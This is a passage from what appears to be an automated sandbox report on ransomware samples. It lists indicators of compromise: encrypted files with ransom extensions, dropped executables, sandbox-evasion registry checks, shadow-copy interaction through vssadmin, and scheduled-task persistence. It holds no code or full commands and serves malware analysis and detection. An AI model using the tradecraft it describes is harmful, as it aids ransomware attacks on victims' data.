DC\Reader\WebResources\Resource0\static\js\plugins\task-handler\js\nls\es-es\ui-strings.js Trojan-Ransom.Win32.Crusis.dzv-0df5f4794a0c890c3bef265b6c820baed2aced17fbf194149337a23ff1dc10ca.exe File opened for modification C:\Program Files\Microsoft Office\root\vfs\System\msvcp140_1.dll Trojan-Ransom.Win32.Crusis.dzv-0df5f4794a0c890c3bef265b6c820baed2aced17fbf194149337a23ff1dc10ca.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\reviews\images\cstm_brand_preview.png.id-7E980581.[[email protected]].bot.id-7E980581.[[email protected]].money Trojan-Ransom.Win32.Rack.itk-666a3daa2ef51e1b14e0abeddecce8ba836a27cc37781899c88a3b6f328d17e6.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\reviews\js\nls\cs-cz\ui-strings.js.id-7E980581.[[email protected]].bot.id-7E980581.[[email protected]].money Trojan-Ransom.Win32.Rack.itk-666a3daa2ef51e1b14e0abeddecce8ba836a27cc37781899c88a3b6f328d17e6.exe File created C:\Program Files\Microsoft Office\root\Licenses16\MondoR_Subscription2-ul-oob.xrm-ms.id-7E980581.[[email protected]].bot.id-7E980581.[[email protected]].money Trojan-Ransom.Win32.Rack.itk-666a3daa2ef51e1b14e0abeddecce8ba836a27cc37781899c88a3b6f328d17e6.exe File created C:\Program Files\Microsoft Office\root\vfs\ProgramFilesX86\Microsoft Office\Office16\DCF\Common.FileUtils.dll.id-7E980581.[[email protected]].bot.id-7E980581.[[email protected]].money Trojan-Ransom.Win32.Rack.itk-666a3daa2ef51e1b14e0abeddecce8ba836a27cc37781899c88a3b6f328d17e6.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\js\nls\zh-tw\ui-strings.js.id-7E980581.[[email protected]].bot Trojan-Ransom.Win32.Rack.itk-666a3daa2ef51e1b14e0abeddecce8ba836a27cc37781899c88a3b6f328d17e6.exe File opened for modification C:\Program Files\Java\jdk-1.8\include\jvmti.h Trojan-Ransom.Win32.Crusis.dzv-0df5f4794a0c890c3bef265b6c820baed2aced17fbf194149337a23ff1dc10ca.exe File created C:\Program Files (x86)\Common Files\Adobe\Reader\DC\Linguistics\Providers\Plugins2\AdobeHunspellPlugin\Abbreviations\en_GB\List.txt.id-7E980581.[[email protected]].bot Trojan-Ransom.Win32.Crusis.dzv-0df5f4794a0c890c3bef265b6c820baed2aced17fbf194149337a23ff1dc10ca.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.0.30251.0_x64__8wekyb3d8bbwe\Assets\AppPackageMedTile.scale-200.png Trojan-Ransom.Win32.Rack.itk-666a3daa2ef51e1b14e0abeddecce8ba836a27cc37781899c88a3b6f328d17e6.exe File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\HxCalendar.App.dll Trojan-Ransom.Win32.Crusis.dzv-0df5f4794a0c890c3bef265b6c820baed2aced17fbf194149337a23ff1dc10ca.exe File created C:\Program Files\Java\jdk-1.8\lib\ir.idl.id-7E980581.[[email protected]].bot.id-7E980581.[[email protected]].money Trojan-Ransom.Win32.Rack.itk-666a3daa2ef51e1b14e0abeddecce8ba836a27cc37781899c88a3b6f328d17e6.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\ProfessionalPipcR_OEM_Perp-ul-oob.xrm-ms.id-7E980581.[[email protected]].bot Trojan-Ransom.Win32.Rack.itk-666a3daa2ef51e1b14e0abeddecce8ba836a27cc37781899c88a3b6f328d17e6.exe File opened for modification C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\THEMES16\AFTRNOON\THMBNAIL.PNG.id-7E980581.[[email protected]].bot Trojan-Ransom.Win32.Rack.itk-666a3daa2ef51e1b14e0abeddecce8ba836a27cc37781899c88a3b6f328d17e6.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\core\dev\nls\fr-fr\ui-strings.js.id-7E980581.[[email protected]].bot Trojan-Ransom.Win32.Rack.itk-666a3daa2ef51e1b14e0abeddecce8ba836a27cc37781899c88a3b6f328d17e6.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.People_10.1902.633.0_x64__8wekyb3d8bbwe\PeopleAppAssets\Videos\people_fre_motionAsset_p2.mp4 Trojan-Ransom.Win32.Crusis.dzv-0df5f4794a0c890c3bef265b6c820baed2aced17fbf194149337a23ff1dc10ca.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\MSOHEV.DLL Trojan-Ransom.Win32.Crusis.dzv-0df5f4794a0c890c3bef265b6c820baed2aced17fbf194149337a23ff1dc10ca.exe File opened for modification C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.27\System.Console.dll.id-7E980581.[[email protected]].bot.id-7E980581.[[email protected]].money Trojan-Ransom.Win32.Rack.itk-666a3daa2ef51e1b14e0abeddecce8ba836a27cc37781899c88a3b6f328d17e6.exe File opened for modification C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\7.0.16\System.Configuration.ConfigurationManager.dll.id-7E980581.[[email protected]].bot Trojan-Ransom.Win32.Rack.itk-666a3daa2ef51e1b14e0abeddecce8ba836a27cc37781899c88a3b6f328d17e6.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\et_get.svg.id-7E980581.[[email protected]].bot Trojan-Ransom.Win32.Rack.itk-666a3daa2ef51e1b14e0abeddecce8ba836a27cc37781899c88a3b6f328d17e6.exe File created C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\ResiliencyLinks\Locales\ms.pak.DATA.id-7E980581.[[email protected]].bot.id-7E980581.[[email protected]].money Trojan-Ransom.Win32.Rack.itk-666a3daa2ef51e1b14e0abeddecce8ba836a27cc37781899c88a3b6f328d17e6.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\s_gridview_selected-hover.svg.id-7E980581.[[email protected]].bot.id-7E980581.[[email protected]].money Trojan-Ransom.Win32.Rack.itk-666a3daa2ef51e1b14e0abeddecce8ba836a27cc37781899c88a3b6f328d17e6.exe File created C:\Program Files\Microsoft Office\root\Office16\ODBC Drivers\Salesforce\lib\1033\SFMESSAGES.XML.id-7E980581.[[email protected]].bot Trojan-Ransom.Win32.Crusis.dzv-0df5f4794a0c890c3bef265b6c820baed2aced17fbf194149337a23ff1dc10ca.exe File opened for modification C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\7.0.16\PresentationFramework-SystemXmlLinq.dll Trojan-Ransom.Win32.Crusis.dzv-0df5f4794a0c890c3bef265b6c820baed2aced17fbf194149337a23ff1dc10ca.exe File created C:\Program Files\VideoLAN\VLC\plugins\access\libaccess_wasapi_plugin.dll.id-7E980581.[[email protected]].bot Trojan-Ransom.Win32.Crusis.dzv-0df5f4794a0c890c3bef265b6c820baed2aced17fbf194149337a23ff1dc10ca.exe File opened for modification C:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\Functions\Assertions\MatchExactly.ps1 Trojan-Ransom.Win32.Crusis.dzv-0df5f4794a0c890c3bef265b6c820baed2aced17fbf194149337a23ff1dc10ca.exe File created C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\7.0.16\fr\PresentationCore.resources.dll.id-7E980581.[[email protected]].bot.id-7E980581.[[email protected]].money Trojan-Ransom.Win32.Rack.itk-666a3daa2ef51e1b14e0abeddecce8ba836a27cc37781899c88a3b6f328d17e6.exe File opened for modification C:\Program Files\Microsoft Office\PackageManifests\AppXManifest.90160000-002C-0409-1000-0000000FF1CE.xml.id-7E980581.[[email protected]].bot Trojan-Ransom.Win32.Rack.itk-666a3daa2ef51e1b14e0abeddecce8ba836a27cc37781899c88a3b6f328d17e6.exe File created C:\Program Files\Microsoft Office\root\vfs\ProgramFilesX86\Microsoft Office\Office16\OLKFSTUB.DLL.id-7E980581.[[email protected]].bot.id-7E980581.[[email protected]].money Trojan-Ransom.Win32.Rack.itk-666a3daa2ef51e1b14e0abeddecce8ba836a27cc37781899c88a3b6f328d17e6.exe File opened for modification C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.ZuneVideo_10.19071.19011.0_neutral_split.scale-125_8wekyb3d8bbwe\Assets\MoviesAnywhereLogoWithTextDark.scale-125.png Trojan-Ransom.Win32.Crusis.dzv-0df5f4794a0c890c3bef265b6c820baed2aced17fbf194149337a23ff1dc10ca.exe -
Drops file in Windows directory 40 IoCs
description ioc Process File opened for modification C:\Windows\zryqncncriuikukh.exe lurwhzlcveb.exe File created C:\Windows\pjsmlcpgxqeuykcbus.exe lurwhzlcveb.exe File opened for modification C:\Windows\njuqrkzslgwouicdyyjf.exe lurwhzlcveb.exe File opened for modification C:\Windows\avfaasgyqkzqvibbvue.exe ajhqekm.exe File opened for modification C:\Windows\avfaasgyqkzqvibbvue.exe ajhqekm.exe File created C:\Windows\qfjysemykyhsrylftmqfjysemykyhsrylft.qfj ajhqekm.exe File opened for modification C:\Windows\gzhayoaqgyladofdv.exe lurwhzlcveb.exe File created C:\Windows\gzhayoaqgyladofdv.exe lurwhzlcveb.exe File opened for modification C:\Windows\avfaasgyqkzqvibbvue.exe lurwhzlcveb.exe File opened for modification C:\Windows\czlikeuoievovkfhdeqnz.exe lurwhzlcveb.exe File created C:\Windows\czlikeuoievovkfhdeqnz.exe lurwhzlcveb.exe File opened for modification C:\Windows\njuqrkzslgwouicdyyjf.exe ajhqekm.exe File opened for modification C:\Windows\zryqncncriuikukh.exe ajhqekm.exe File opened for modification C:\Windows\zryqncncriuikukh.exe lurwhzlcveb.exe File opened for modification C:\Windows\avfaasgyqkzqvibbvue.exe lurwhzlcveb.exe File opened for modification C:\Windows\gzhayoaqgyladofdv.exe ajhqekm.exe File opened for modification C:\Windows\qfjysemykyhsrylftmqfjysemykyhsrylft.qfj ajhqekm.exe File created C:\Windows\zryqncncriuikukh.exe lurwhzlcveb.exe File opened for modification C:\Windows\pjsmlcpgxqeuykcbus.exe lurwhzlcveb.exe File created C:\Windows\njuqrkzslgwouicdyyjf.exe lurwhzlcveb.exe File opened for modification C:\Windows\czlikeuoievovkfhdeqnz.exe lurwhzlcveb.exe File created C:\Windows\trecfarmhewqyoknkmzxki.exe lurwhzlcveb.exe File opened for modification C:\Windows\zryqncncriuikukh.exe ajhqekm.exe File opened for modification C:\Windows\gzhayoaqgyladofdv.exe ajhqekm.exe File opened for modification C:\Windows\pjsmlcpgxqeuykcbus.exe ajhqekm.exe File opened for modification C:\Windows\pjsmlcpgxqeuykcbus.exe ajhqekm.exe File opened for modification C:\Windows\njuqrkzslgwouicdyyjf.exe ajhqekm.exe File opened for modification C:\Windows\czlikeuoievovkfhdeqnz.exe ajhqekm.exe File created C:\Windows\haveafun.dll Trojan-Ransom.Win32.PolyRansom.bvxo-f744e61e2b8b28ee3cf224e200d17b4706a946e9466437da2c3ccff253da0f9f.exe File opened for modification C:\Windows\gzhayoaqgyladofdv.exe lurwhzlcveb.exe File opened for modification C:\Windows\njuqrkzslgwouicdyyjf.exe lurwhzlcveb.exe File opened for modification C:\Windows\trecfarmhewqyoknkmzxki.exe ajhqekm.exe File opened for modification C:\Windows\trecfarmhewqyoknkmzxki.exe ajhqekm.exe File opened for modification C:\Windows\hleirspqrussgcenqyrvosbc.abe ajhqekm.exe File created C:\Windows\avfaasgyqkzqvibbvue.exe lurwhzlcveb.exe File opened for modification C:\Windows\trecfarmhewqyoknkmzxki.exe lurwhzlcveb.exe File opened for modification C:\Windows\czlikeuoievovkfhdeqnz.exe ajhqekm.exe File created C:\Windows\hleirspqrussgcenqyrvosbc.abe ajhqekm.exe File opened for modification C:\Windows\pjsmlcpgxqeuykcbus.exe lurwhzlcveb.exe File opened for modification C:\Windows\trecfarmhewqyoknkmzxki.exe lurwhzlcveb.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 64 IoCs
pid pid_target Process procid_target 3828 1408 WerFault.exe 114 3520 4412 WerFault.exe 137 4228 4412 WerFault.exe 137 2684 4412 WerFault.exe 137 1692 5072 WerFault.exe 154 860 4412 WerFault.exe 137 2256 4412 WerFault.exe 137 4384 4412 WerFault.exe 137 1112 4412 WerFault.exe 137 280 1396 WerFault.exe 180 5572 4412 WerFault.exe 137 5772 1396 WerFault.exe 180 5924 4412 WerFault.exe 137 5940 1396 WerFault.exe 180 6008 4412 WerFault.exe 137 6108 1396 WerFault.exe 180 3884 4412 WerFault.exe 137 2404 1396 WerFault.exe 180 5128 4412 WerFault.exe 137 1400 1396 WerFault.exe 180 5808 1396 WerFault.exe 180 5588 4412 WerFault.exe 137 5380 2864 WerFault.exe 175 5800 4412 WerFault.exe 137 6456 1396 WerFault.exe 180 6700 4412 WerFault.exe 137 6984 1396 WerFault.exe 180 6108 4412 WerFault.exe 137 8668 4412 WerFault.exe 137 7780 1396 WerFault.exe 180 6456 1396 WerFault.exe 180 5392 4412 WerFault.exe 137 9256 1396 WerFault.exe 180 1940 4412 WerFault.exe 137 7940 1396 WerFault.exe 180 2672 4412 WerFault.exe 137 11004 1396 WerFault.exe 180 6704 4412 WerFault.exe 137 8928 1396 WerFault.exe 180 7988 4412 WerFault.exe 137 9244 4412 WerFault.exe 137 5840 1396 WerFault.exe 180 9224 9200 WerFault.exe 301 10904 4412 WerFault.exe 137 5776 9200 WerFault.exe 301 8904 4412 WerFault.exe 137 7348 9200 WerFault.exe 301 5448 4412 WerFault.exe 137 6924 9200 WerFault.exe 301 9700 4412 WerFault.exe 137 10336 9200 WerFault.exe 301 11148 4412 WerFault.exe 137 8356 9200 WerFault.exe 301 856 4412 WerFault.exe 137 7260 9200 WerFault.exe 301 8560 4412 WerFault.exe 137 5940 9200 WerFault.exe 301 6872 4412 WerFault.exe 137 5600 9200 WerFault.exe 301 6888 4412 WerFault.exe 137 8008 9200 WerFault.exe 301 8680 4412 WerFault.exe 137 8128 9200 WerFault.exe 301 6188 4412 WerFault.exe 137 -
System Location Discovery: System Language Discovery 1 TTPs 64 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language nslookup.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Trojan-Ransom.Win32.Stop.hz-0bd793b8bee39280c76f9f4dd793a147d600f9234233833a81be0d87dbf9e482.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Trojan-Ransom.Win32.Xpan.h-10b893ca31e0e5c0c22350f66d98cefd2c5f74f65d5efe5ab137a63de2bc70ff.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Sunwin.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Trojan-Ransom.Win32.Sodin.g-9fa3a004576f357b5174dd1c29ef7d13005d996d5f9fb4b86d6d978d1a4a84ae.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language HEUR-Trojan-Ransom.Win32.PolyRansom.gen-79257f7687a515e953bcab205bc308e20cb73a89f64f316c678c64206229778c.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Trojan-Ransom.Win32.Crusis.dzv-0df5f4794a0c890c3bef265b6c820baed2aced17fbf194149337a23ff1dc10ca.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language HEUR-Trojan-Ransom.Win32.JSWorm.gen-575933c6efb982050b56c2d838c878ee2aba3c89743cfcc58fdc26ab7b76a317.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Trojan-Ransom.Win32.Blocker.ckeq-ee96cebfbf4f65e11bd58a1a4b8463b48058466701282fd1ecf29742bda07828.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language HEUR-Trojan-Ransom.Win32.Blocker.vho-1c4c3554390a89ee17b678d9ccf4c424056264026854240e2a012a37b44235a1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language HEUR-Trojan-Ransom.Win32.Foreign.gen-ff6e9f1b64ba5d0c4994921a56321c3026f655b01614e2d16c84edd75be51b8d.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language attrib.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language lurwhzlcveb.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language ajhqekm.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Trojan-Ransom.Win32.Crusis.dtk-6518ea1cc077c71291c07ddfe744ea7c8f65b6578a63f6a9e56db2af143bdd71.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Trojan-Ransom.Win32.Foreign.jxku-bf63837b5da7be5191e1c0b79a827ce8649971297f355845ae968cc44c7d9162.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language HEUR-Trojan-Ransom.Win32.GandCrypt.gen-d1996b5f2d34a9e8912542c40c8fe47b5f1545d4ae6a86d807e36fd20fd08477.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language HEUR-Trojan-Ransom.Win32.Mircop.gen-b50f64fbb72a9668bd98e0750dc0dd6eff84cd3bb439f6f3f7f665cbc039b7ca.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Trojan-Ransom.Win32.Sodin.alx-3fc734a086c8d3aba757aa147a8d46a317e47bb0372f1fb2abf0a163a5d2938b.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Trojan-Ransom.Win32.Stop.gr-7b3eb4e7cad673ac4e9d3894466a15dedd45621d116e0222209b3ab98b6677c3.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language icacls.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language HEUR-Trojan-Ransom.MSIL.Foreign.gen-5a7a7c94eed3eea9fbc9ff1a32ea3422b46496e405f90858b1b169bb60bdbac6.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Trojan-Ransom.Win32.Blocker.jzlx-61ce4f9766f5e50b03a1cc19a732253a6db9c93f76c3f1676a91c8c17f611bdd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Trojan-Ransom.Win32.Stop.gr-7b3eb4e7cad673ac4e9d3894466a15dedd45621d116e0222209b3ab98b6677c3.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Trojan-Ransom.Win32.Crusis.dzv-0df5f4794a0c890c3bef265b6c820baed2aced17fbf194149337a23ff1dc10ca.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Trojan-Ransom.Win32.DigiPog.ep-6ba69449c4bddf553abcd497349a15b5636bcf649e31c1242959d980cb0ed1cc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Trojan-Ransom.Win32.Stop.hz-0bd793b8bee39280c76f9f4dd793a147d600f9234233833a81be0d87dbf9e482.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Trojan-Ransom.Win32.Rack.itk-666a3daa2ef51e1b14e0abeddecce8ba836a27cc37781899c88a3b6f328d17e6.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Trojan-Ransom.Win32.Sodin.aak-4f3abc6a072b9e66a20dc5ee1dde6754beb1a3e175b2668fe540cca641c9969e.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language HEUR-Trojan-Ransom.Win32.Foreign.gen-ff6e9f1b64ba5d0c4994921a56321c3026f655b01614e2d16c84edd75be51b8d.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language VHO-Trojan-Ransom.Win32.GandCrypt.gen-58803c76d2fe76fd10c75d7c8393a5b002f00c6d14f14b9a748ac3efc1bc830c.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language nslookup.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language nslookup.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Trojan-Ransom.Win32.GandCrypt.jes-9cac4dfdc342e07a3feea28d56a11a2284544f7d63dbce610fe6ac0d03ac8044.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Trojan-Ransom.Win32.PolyRansom.bvxo-f744e61e2b8b28ee3cf224e200d17b4706a946e9466437da2c3ccff253da0f9f.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language tpvpyme.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Trojan-Ransom.Win32.Sodin.bi-4871bea79e651791fb79ef0bc46f61e728c41d27e7f5b8877d0958a8672f26ea.exe -
Checks SCSI registry key(s) 3 TTPs 15 IoCs
SCSI information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000 taskmgr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000 taskmgr.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\FriendlyName taskmgr.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\FriendlyName taskmgr.exe Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI HEUR-Trojan-Ransom.Win32.JSWorm.gen-575933c6efb982050b56c2d838c878ee2aba3c89743cfcc58fdc26ab7b76a317.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A taskmgr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A taskmgr.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\FriendlyName taskmgr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI HEUR-Trojan-Ransom.Win32.JSWorm.gen-575933c6efb982050b56c2d838c878ee2aba3c89743cfcc58fdc26ab7b76a317.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI HEUR-Trojan-Ransom.Win32.JSWorm.gen-575933c6efb982050b56c2d838c878ee2aba3c89743cfcc58fdc26ab7b76a317.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A taskmgr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000 taskmgr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A taskmgr.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\FriendlyName taskmgr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000 taskmgr.exe -
Checks processor information in registry 2 TTPs 6 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 Trojan-Ransom.Win32.GandCrypt.jes-9cac4dfdc342e07a3feea28d56a11a2284544f7d63dbce610fe6ac0d03ac8044.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString Trojan-Ransom.Win32.GandCrypt.jes-9cac4dfdc342e07a3feea28d56a11a2284544f7d63dbce610fe6ac0d03ac8044.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier Trojan-Ransom.Win32.GandCrypt.jes-9cac4dfdc342e07a3feea28d56a11a2284544f7d63dbce610fe6ac0d03ac8044.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 VHO-Trojan-Ransom.Win32.GandCrypt.gen-58803c76d2fe76fd10c75d7c8393a5b002f00c6d14f14b9a748ac3efc1bc830c.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString VHO-Trojan-Ransom.Win32.GandCrypt.gen-58803c76d2fe76fd10c75d7c8393a5b002f00c6d14f14b9a748ac3efc1bc830c.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier VHO-Trojan-Ransom.Win32.GandCrypt.gen-58803c76d2fe76fd10c75d7c8393a5b002f00c6d14f14b9a748ac3efc1bc830c.exe -
Interacts with shadow copies 3 TTPs 4 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
pid Process 10208 vssadmin.exe 4460 vssadmin.exe 1808 vssadmin.exe 5588 vssadmin.exe -
Scheduled Task/Job: Scheduled Task 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 3476 schtasks.exe 3844 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
